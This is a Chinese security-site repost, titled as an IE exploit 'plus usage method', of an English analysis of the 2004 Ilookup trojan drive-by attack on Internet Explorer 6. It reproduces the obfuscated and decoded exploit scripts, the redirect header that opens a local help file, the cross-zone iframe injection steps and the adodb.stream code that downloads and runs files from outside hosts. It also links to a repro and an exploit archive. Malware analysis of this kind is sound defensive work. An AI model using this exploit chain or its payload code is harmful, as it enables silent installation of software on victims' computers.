IE最新漏洞+使用方法

		当前位置：主页>安全文章>文章资料>入侵实例>文章内容

IE最新漏洞+使用方法

来源：www.bugkidz.org 作者：knife 发布时间：2004-06-22

IE最新漏洞+使用方法！

　　继数天前被发现存在两个“极度危急”的漏洞之后，IE浏览器近日再度爆出新的安全隐患。只要IE用户不小心点击了经特殊设计的超级链接，攻击者就可以获得对该用户计算机的控制权限。就算是应用了所有补丁程序的IE 6.0也不可避免地受到这一攻击行为的威胁。

　　攻击者使用的手法是联合运用一系列Javascript、VBScript和PHP代码来利用IE中的多个漏洞，包括一个最新发现但还没有相关补丁程序的漏洞。这些技术已被发布到网络上面并被多个安全邮件表所讨论。

　　当用户点击电子邮件或网页上的恶意链接时，攻击者就会在用户的计算机上安装木马程序。具体的过程是：受感染系统的IE浏览器会弹出一个带有“iframe”标签的浮动窗口，显示文本信息或交互内容。这些内容会欺骗用户，促使他们认为iframe中的帮助文件来自用户硬盘。但此时它已在下载Javascript，然后取得对受感染系统的本地权限。Javascript接着会运行一个远程PHP文件，该PHP文件又会将一个木马程序下载到用户的硬盘中。

　　想了解该漏洞的完整分析和利用该漏洞的方法的朋友可以点击这里查看。
http://62.131.86.111/analysis.htm
因为网络问题，我转贴过来了

An analysis of the Ilookup Trojan

updated 8-6

- redirect issue is more like Thor's redirect than mindwarpers, since it also works outside of an dynamic iframe
- expanded on the iframe caching portion

updated 9-6

- renamed the title indeed ilookup would appear to be unassociated with 180 solutions

Introduction

Just when I though it was save to once more to use internet explorer I received an email bringing my attention to this webpage http://216.130.188.219/ei2/installer.htm that according to him used an exploit that affected fully patched internet explorer 6 browsers. Being rather skeptical I carelessly clicked on the link only to witness how it automatically installed addware on my pc!!!

Now there had been reports about 0day exploits making rounds for quite some time like for instance this post

http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0

However I hadn't seen any evidence to support this up until now
Thor Larholm as usual added to the confusion by deliberately spreading disinformation as seen in this post

http://seclists.org/lists/bugtraq/2004/May/0153.html

attributing it to and I quote "just one of the remaining IE vulnerabilities that are not yet patched"
This analysis will show that there are at least 2 new and afaik unpublished exploits (feel free to proof me wrong) out there in the wild, one being very sophisticated

Analysis

Brace yourselves this is some serious handywork The first page we encounter installer.htm looks like this :

<HTML><BODY><SCRIPT language=\"JScript.Encode\">#@~^/gAAAA==@#@&@#@&7lMP:HVK^P{P[W1EhnYR^GmmYkKU tM+<ahref=\"mailto:6i@#@&hz^W^{m.D\">6i@#@&hz^W^{m.D</a>,'~hHVW^ kwskDcrgE*<ahref=\"mailto:i@#@&:HDW{mD.P{Phz^Wmcdw^kYvE_D0r#I@#@&@#@&:zVK^P{Phz^WmmCMD\">i@#@&:HDW{mD.P{Phz^Wmcdw^kYvE_D0r#I@#@&@#@&:zVK^P{Phz^WmmCMD</a>,!<ahref=\"mailto:YI@#@&-mD\">YI@#@&-mD</a>,:XM+6~',:zD0mCMD$<ahref=\"mailto:8Di@#@&@#@&-CD\">8Di@#@&@#@&-CD</a>,:HVnxLO4PxPvhX^W^^+xLO4PRP8f*<ahref=\"mailto:i@#@&:HVW1P{~:HVGmc/;8kYDvT~sXVULY4#p@#@&wEoAAA==^#~@\">i@#@&:HVW1P{~:HVGmc/;8kYDvT~sXVULY4#p@#@&wEoAAA==^#~@</a></SCRIPT><Scriptlanguage=\"JScript.Encode\">#@~^GAIAAA==@#@&\CMPsX/DD,xPvEU+kmC2`JufZkmDb2O]y!^lUo;CT+Y&GYy9C-m/m.raYY yY22YZfu!b6E ^YbWU]y!(UN+mDnNGEDbULINbDnmOrKxY RYO]T9u!bYTG]Tbu{~]TG]Zb]Z,k4WSHGNmV9rmVWTY R] Fh[R4Ys]+GY+;hrx9Ghu /Yy NrC^WLKK2u&)FZ!!Z]l/]2A[kmVGLd+0DY&zOFZTT!u*;]fA[rmVGo_nkTtOY2bFYX;]fA9rmVGTbNY4]2)Fu*/]2AY+y] OVKmlDrGxu&G]+!Y+yLC\mdmMk2Ou&bY+F]fZU/\"qK:]y!?\"Zuffu*/]lZY+FJ#,QPsXVK^~_,E+dmC2`E/4nV^/^.bwYmsKl[+MmN/ ata]&wDW]2fE#,_~hHD+6~_,Exd^la+vJY*/YlZY FY&A]f/u*Z&j;I(n:Y22YyGu!u ZY y]fAu!9YZb]Z9]Zb]F9Y!G]ZbY&/&km.kaO]22Eb*<ahref=\"mailto:i@#@&\">i@#@&</a>[Km;:UDRAMkD+`sXkOD*<ahref=\"mailto:i@#@&OZoAAA==^#~@\">i@#@&OZoAAA==^#~@</a></Script><SCRIPT language=\"JScript.Encode\">#@~^VQEAAA==@#@&@#@&6E mYbW ~hbx[WS)lGEx^Gl9`#@#@&`@#@&@#@&d.+O;Mx~0ms/<ahref=\"mailto:i@#@&@#@&8@#@&@#@&d+DPb:nKED`JsXbWDm:nR6n^UmDb2YvqxNn^YNGE.kUL\">i@#@&@#@&8@#@&@#@&d+DPb:nKED`JsXbWDm:nR6n^UmDb2YvqxNn^YNGE.kUL</a>\"+[kMnmDkGUcYWjOMkUovb*JS8!Z#<ahref=\"mailto:i@#@&knY:kh+KEOcrd:Hr0Ml:\">i@#@&knY:kh+KEOcrd:Hr0Ml:</a>n6mUm.k2OvB(xNnmD+[9!DkUL\"+[kMn1YrKxv#B*<ahref=\"mailto:drSFZFbi@#@&\">drSFZFbi@#@&</a>[G1E:UYchDbOn`<ahref=\"mailto:E@!&s\">E@!&s</a>]b\3,q9'szk6DChP1)\A'hXbWMlhPUIZ{JMnNbDw4wE~qqf:u'y!!,u3qVC:'+!<ahref=\"mailto:T@*@!z\">T@*@!z</a>(s\")<ahref=\"mailto:HA@*vbp@#@&wmMAAA==^#~@\">HA@*vbp@#@&wmMAAA==^#~@</a></SCRIPT></BODY></HTML>

The JavaScript code is encoded using The Windows Script Encoder (screnc.exe), a Microsoft tool that can be used to encode your scripts This encoding only prevents casual viewing of your code and is easily defeated If you've got some minutes to spare you can write your own decoder or if you're lazy download a precompiled one from here : http://www.virtualconspiracy.com/scrdec.html You'll see this encoding used throughout the entire exploit as a way to obfuscate it's function and avoid detection by virus scanners

<html><body><script language=\"javascript\">var myloc = document.location.href;myloc_arr = myloc.split(\"?\");myref_arr = myloc.split(\"?ref\");myloc = myloc_arr[0];var myref = myref_arr[1];var mylength = (myloc.length - 13);myloc = myloc.substr(0,mylength);</script><script language=\"javascript\"> var mystr = (unescape(\"%3Cscript%20language%3D%22Javascript%22%3E%0D%0Afunction%20InjectedDuringRedirection%28%29%0D%0A%0D%0A%7B%0D%0A%09showModalDialog%28%27md.htm%27%2Cwindow%2C%22dialogTop%3A-10000%5C%3BdialogLeft%3A-10000%5C%3BdialogHeight%3A1%5C%3BdialogWidth%3A1%5C%3B%22%29.location%3D%20%22javascript%3A%27%3CSCRIPT%20SRC%3D%5C%5C%27\")+ myloc + unescape(\"shellscript_loader_js.php%3Fref%3D\") + myref +unescape(\"%5C%5C%27%3E%3C%5C/script%3E%27%20%20%22%3B%0D%0A%0D%0A%7D%0D%0A%3C/script%3E\")); document.write(mystr);</script><script language=\"javascript\">function window::onunload() { return false;}setTimeout(\"myiframe.execScript(InjectedDuringRedirection.toString())\",100);setTimeout(\"myiframe.execScript('InjectedDuringRedirection()') \",101);document.write('<IFRAME ID=myiframe NAME=myiframe SRC=\"redir.php\" WIDTH=200HEIGHT=200></IFRAME>');</script></body></html>

There are to things to note going on in this page

1. in the third script block it loads redir.php in an iframe named myiframe

this is a php script that loads ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htm In an iframe This shouldn't be happening, from Internet explorer 6 SP1 on access to the local file system is disallowed Looking at the headers it would appears to be a variation of Thor's redirect that had been long patched, the new element being the URL: prefix which makes it work once more

HTTP/1.1 302 FoundDate: Sat, 05 Jun 2004 21:24:19 GMTServer: Apache/1.3.28 (Unix) mod_fastcgi/2.4.0 PHP/4.3.5X-Powered-By: PHP/4.3.5Location: URL:ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htmConnection: closeTransfer-Encoding: chunkedContent-Type: text/html

This file is located on the users harddisk, Web pages accessed from the local computer are placed in the Local Machine zone, where they have the fewest security restrictions. since local content is considered to be secure. However a lot of recent exploits have taken advantage of the Local Machine zone to elevate their privileges and compromise a computer. So by now we can see where this is heading, it's the same modus operandi we've seen over and over in the past months, it goes something like this

引文:
Find an cross zone scripting exploit

引文:
Load a local trusted resource in an iframe

引文:
Inject javascript code in the trusted iframe using the cross zone scripting exploit to take over the computer, using the adodb.stream issue for instance

Another thing to note is that this file is deliberately not loaded immediately, it waits about 1,5 seconds before doing the redirect

Now up until now I didn't think there where anymore cross zone scripting exploits around , for sure there hasn't been one reported to bugtraq or any other security related list I am subscribed to (afaik anyway). So let's dig deeper shall we

2. in the second script block it displays a model dialog

mystr is urlencoded when we decoded we get something approximating this

As you can see it's initially loading a file called md.htm in a model dialog this file contains yet even more encoded scripting

<SCRIPT language=\"JScript.Encode\">#@~^7AAAAA==@#@&hr NKhRM+D;D .CV!+~x,hk[WSRNbCsWTbMo;:nUD/I@#@&@#@&6EU^DkWU~;tnm0jDlO!/v#@#@&<ahref=\"mailto:dP@#@&idODH\">dP@#@&idODH</a> Onsw.m.'Skx9GAR9kmVGo).TEh+O/cVG^mYkGUct.+6I)mCDm4`+* Srx9WAR1VGd`#<ahref=\"mailto:pN@#@&ddknOKb:W;YcE;tnm0jYmY;dv#JSqZ!bi@#@&i8@#@&d@#@&Z4+1V?DlOEk`bI@#@&y0cAAA==^#~@\">pN@#@&ddknOKb:W;YcE;tnm0jYmY;dv#JSqZ!bi@#@&i8@#@&d@#@&Z4+1V?DlOEk`bI@#@&y0cAAA==^#~@</a></SCRIPT>

which when we decode it becomes

<SCRIPT language=\"javascript\">window.returnValue = window.dialogArguments;function CheckStatus(){ try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();} setTimeout(\"CheckStatus()\",100);}CheckStatus();</SCRIPT>

Ok lets see what we've got, the dialogargument passed to the function is the current window, it caches this object , and checks every 100 ms if it can access the location object of the window object, if the domain changes it will throw an security exception and the window will close itself

java script:'<SCRIPTSRC=\\'***MYLOC_HERE***shellscript_loader_js.php?ref=***MYREF_HERE***\\'><\/script>'\";

Which means the body of md.htm gets dropped and is replaced by a script include called shellscript_loader_js.php

function getRealShell() {myiframe.document.write(\"<SCRIPTSRC='http://216.130.188.219/ei2/shellscript_js.php?ref=undefined'><\/SCRIPT>\");}document.write(\"<IFRAME ID=myiframe SRC='about :blank' WIDTH=200HEIGHT=200></IFRAME>\");setTimeout(\"getRealShell()\",100);

ok as you can see this script includes another script called shellscript_js.php which looks like this : shellscript_js.php

document.write(
unescape("%3CSCRIPT%20LANGUAGE%3D%22JAVASCRIPT%22%3E%0D%0A%20%20%20%20function%20getPath%28%29%20%7B%20%0D%0A%20%20%20%20/*ending%20with%20%22/%22*/%0D%0A%20%20%20%20return%20%22http://216.130.188.219/ei2%22%3B%0D%0A%20%20%20%20%7D%0D%0A%0D%0A%20%20%20%20function%20getRef%28%29%20%7B%20%0D%0A%20%20%20%20/*ending%20with%20%22/%22*/%0D%0A%20%20%20%20return%20%22undefined%22%3B%0D%0A%20%20%20%20%7D%0D%0A%3C/SCRIPT%3E")+
unescape("%3Cscript%20language%3D%22JScript.Encode%22%3E%23@%7E%5EHQQAAA%3D%3D@%23@%26P%7E%2CP1l4alD4P%7BPEZ%3D-wr%09/YmsVcml%28EI@%23@%26P%2CP%7EtOh%5EwCY4%7E%27%2CJ/l%27-kUdDlsVc4D%3AEp@%23@%26PP%2CP1C4%60IJP%7BPE4DYw%3D%26zDWW%5E8CDyRbOsWGV%21w%20mKhzDWGs%28lD+%26SkUN%7F%5E2%20%201l%28Ji@%23@%26%2C%7EP%2CtO%3A%5Ej%5DJ%2C%27PTnYhlY4cbP3PrzrxdOmVsRa4wQDnW%7BJPQ%7ET+OI%7FWv%23I@%23@%26@%23@%26P%2CP%2C-lMPamm4%7Ex%2Cx+S%7Eb1Yk7npr%28L%7FmO%60E%5Cbm.WkG0DRp%5CdCKPKr%23IP@%23@%26%2CP%7E%2C61l4cranxvJ%212%3AJS%5Em4j%22J%7EZ%23i%2C@%23@%26P%2CP%2C6%5El8%20U+UNvbi%2C@%23@%26%7E%2CPP@%23@%26%2CP%7EP7CMPd1l%28P%27%2Cx%7FAPzmOk7+p6%28L+1O%60rbf%7D9%24RUYM+C%3AEbp@%23@%26P%2C%7EPkmC8cHW%5Bn%2C%27%7E%26p@%23@%26P%7E%2CPkml%28R%3Azw%7FPxP8i@%23@%26%2CPP%2Cdmm4R%7D2nxv%23p@%23@%26P%7E%7E%2C/%5El%28%20%7FMkOnv6mC8cDn/aG%09/n%7EW9X%23p@%23@%26%7EP%2CPdmm4%20jm%5C+%3AGsbV+v%5EC4alDtS%20bI@%23@%26%7EP%2C%7E@%23@%26P%7E%7E%2C%5Cl.%7EXtO%3A%2Cx%2CxnSPzmYb%5C%7Fpr%28LnmD%60E%5CbmDKdW6YRo%5CJC%3AKhJbi%7E@%23@%26P%7EP%2CatD%3A%206a+xcEV2PJB4D%3As%60Id%7E%21*i%2C@%23@%26%2CP%7EPXtOhc%3F+%09%5B%60*iP@%23@%26%7EP%2CP@%23@%26%7EP%7E%7E7l.Pk4YsV%7Ex%2Cx+A%7EzmOk7nor8N+1Y%60rbG6f%7ERjYM+Chr%23i@%23@%26P%2CPPk4O%3A%5ERtW%5B+%7Ex%2C%26I@%23@%26%7EP%2CPd4D%3AV%20PHwnP%7B%7E8i@%23@%26P%2CPPktDhVcr2+%09%60bI@%23@%26P%2C%7EPktYss%20%7FMkD+c64OsR.+k2W%09/n%24KNXbI@%23@%26%7EP%2C%7EktOsVc%3Fl7+%3AGsbVn%604YhsalY4S%20*i@%23@%26@%23@%26P%2CP%2ChxhrU9WARK2+%09%60E/%3D--rUkYCV%5E%204Yhr%7E%2CBNK%7BbU/DlsVE%7E%7EvDWW%5E8lM%27%21Bhnx%214mDx%21Sd1DGV%5E8lM/xTB/YCO%21/x%21B.%7F/r.l%28V+%7B%21BAk9Y4%27y%21S4%7Fko4O%27y%21%7E%2COGw%7B%26Z%21T%21S%7E%5E+WY%7Bq%21BBbI@%23@%26P%7E%7E%2C/nV6%20%5EW%5EmYbWxctMn0%2C%27%7EJm4G%3BD%294%5ECx0Ji@%23@%26eiMBAA%3D%3D%5E%23%7E@%3C/script%3E"));
[/code]

when we urldecode it it looks like this

<SCRIPT language=\"javascript\"> function getPath() { /*ending with \"/\"*/ return \"http://216.130.188.219/ei2\"; } function getRef() { /*ending with \"/\"*/ return \"undefined\"; }</SCRIPT><scriptlanguage=\"JScript.Encode\">#@~^HQQAAA==@#@&P~,P1l4alD4P{PEZ=-wr /YmsVcml(<ahref=\"mailto:EI@#@&P\">EI@#@&P</a>,P~tOh^wCY4~',J/l'-kUdDlsVc4D:Ep@#@&PP,P1C4`IJP{PE4DYw=&zDWW^8CDyRbOsWGV!wmKhzDWGs(lD+&SkUN^2 1l(<ahref=\"mailto:Ji@#@&\">Ji@#@&</a>,~P,tO:^j]J,'PTnYhlY4cbP3PrzrxdOmVsRa4wQDnW{JPQ~T+OIWv#<ahref=\"mailto:I@#@&@#@&P\">I@#@&@#@&P</a>,P,-lMPamm4~x,x+S~b1Yk7npr(LmO`E\bm.WkG0DRp\dCKPKr#<ahref=\"mailto:IP@#@&\">IP@#@&</a>,P~,61l4cranxvJ!2:JS^m4j\"J~Z#i,@#@&P,P,6^l8U+UNvbi,@#@&~,<ahref=\"mailto:PP@#@&\">PP@#@&</a>,P~P7CMPd1l(P',xAPzmOk7+p6(L+1O`rbf}9$RUYM+C:Ebp@#@&P,~PkmC8cHW[n,'~&<ahref=\"mailto:p@#@&P~\">p@#@&P~</a>,Pkml(R:zw<ahref=\"mailto:PxP8i@#@&\">PxP8i@#@&</a>,PP,dmm4R}2nxv#<ahref=\"mailto:p@#@&P~~\">p@#@&P~~</a>,/^l( MkOnv6mC8cDn/aG /n~W9X#<ahref=\"mailto:p@#@&~P\">p@#@&~P</a>,Pdmm4 jm\+:GsbV+v^C4alDtS <ahref=\"mailto:bI@#@&~P\">bI@#@&~P</a>,~@#@&P~~,\l.~XtO:,x,xnSPzmYb\pr(LnmD`E\bmDKdW6YRo\JC:KhJbi~@#@&P~P,atD:6a+xcEV2PJB4D:s`Id~!*i,@#@&,P~PXtOhc?+ [`*<ahref=\"mailto:iP@#@&~P\">iP@#@&~P</a>,<ahref=\"mailto:P@#@&~P~~7l.Pk4YsV~x\">P@#@&~P~~7l.Pk4YsV~x</a>,x+A~zmOk7nor8N+1Y`rbG6f~RjYM+Chr#<ahref=\"mailto:i@#@&P\">i@#@&P</a>,PPk4O:^RtW[+~x,&<ahref=\"mailto:I@#@&~P\">I@#@&~P</a>,Pd4D:V PHwnP{~<ahref=\"mailto:8i@#@&P\">8i@#@&P</a>,PPktDhVcr2+ `<ahref=\"mailto:bI@#@&P\">bI@#@&P</a>,~PktYss MkD+c64OsR.+k2W /n$<ahref=\"mailto:KNXbI@#@&~P\">KNXbI@#@&~P</a>,~ktOsVc?l7+:GsbVn`4YhsalY4S *<ahref=\"mailto:i@#@&@#@&P\">i@#@&@#@&P</a>,P,hxhrU9WARK2+ `E/=--rUkYCV^4Yhr~,BNK{bU/DlsVE~~vDWW^8lM'!Bhnx!4mDx!Sd1DGV^8lM/xTB/YCO!/x!B./r.l(V+{!BAk9Y4'y!S4ko4O'y!~,OGw{&Z!T!S~^+WY{q!<ahref=\"mailto:BBbI@#@&P~~\">BBbI@#@&P~~</a>,/nV6^W^mYbWxctMn0,'~Jm4G;D)4^<ahref=\"mailto:Cx0Ji@#@&eiMBAA==^#~@\">Cx0Ji@#@&eiMBAA==^#~@</a></script>

nd when we finally remove the Script encoding it looks like this which we immediately recognize as the adodb.stream issue I reported on Aug 26 2003!! (red. Microsoft where's the patch??)

when ran in the localzone this script would download 2 files to disk and execute them thus installing the ilookup toolbar

http://toolbar2.i-lookup.com/toolbar2/windec32.cab to C:\install.cab
http://216.130.188.219/ei2/install.php to c:\install.htm

Lets reflect on what we've seen and attempt a reconstruction

1. redir.php is requested by the iframe but not immediately loaded because it uses php to create a 1,5 second lag

2. setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100); , InjectedDuringRedirection.toString is the text of the function so nothing gets executed, the function gets attached to the window object associated with the iframe

3. setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101); calls the function step 2 attached to the window

4. This function creates a modal dialog and passes window as dialogargument , because the iframe's execscript method is used to call it , the window object is not the real window object but actually refers to the iframe you just dynamically created

5. redir.php completes loading and redirects to a local help file

6. md.htm can now no longer access the location object of the iframe , and throws an exception what causes the modal dialog to close

7 InjectedDuringRedirection now unblocks where it had blocked due to the modal dialog being called, the call returns the cached iframe object from before the redirect changed it's location Now because InjectedDuringRedirection was called with myiframe.execScript and myiframe's contents just changed it no longer has a document property, and the new one hasn't been set yet, but you can change the location of the iframe, this shouldn't be possible!!, so what they now proceed to do is change the location by setting the location on the cached refference to the iframe like this

.location=\"java script:'<SCRIPTSRC=\\'***MYLOC_HERE***shellscript_loader_js.php?ref=***MYREF_HERE***\\'><\/script>'\";

this writes out everything between the quotes to the body of the document, the location you are now effectively in the localzone but apparently internet explorer has some kind of safeguard that says, no document that has "java script: .... " in the URL can so you can't access it directly but any iframe you open from here would be in the local zone, yes that makes sense doesn't it , well blame microsoft

8. shellscript_loader_js.php now creates an iframe which is regarded as being in the localzone and includes the final script shellscript_js.php which is now run from there

9. shellscript_js.php uses the adodb.stream bug which only works in the local zone to download and start, 2 files

Conclusion

What have we learned?

The Trojan uses several known and 2 previously unknown vulnerabilities in internet explorer
the unknown ones being

1. Location: URL: allows access to local resources
2. A cross zone access vulnerability

The latter being quite non trivial (whomever created this beast sure knew what he was doing but although I have the utmost respect for your work your still a scumbag for perverting it in this fashion)

to install the ilookup toolbar from http://toolbar2.i-lookup.com/toolbar2/windec32.cab

Demonstation

A cleaned up harmless demonstration of techniques used in this exploit can be found here

http://62.131.86.111/security/idiots/repro/installer.htm
people who have not installed internet explorer service pack 1 can click here

http://62.131.86.111/security/idiots/repro/sp0/installer.htm

Alternatively you can download the files for the exploit here http://62.131.86.111/security/idiots/repro/exploit.zip

[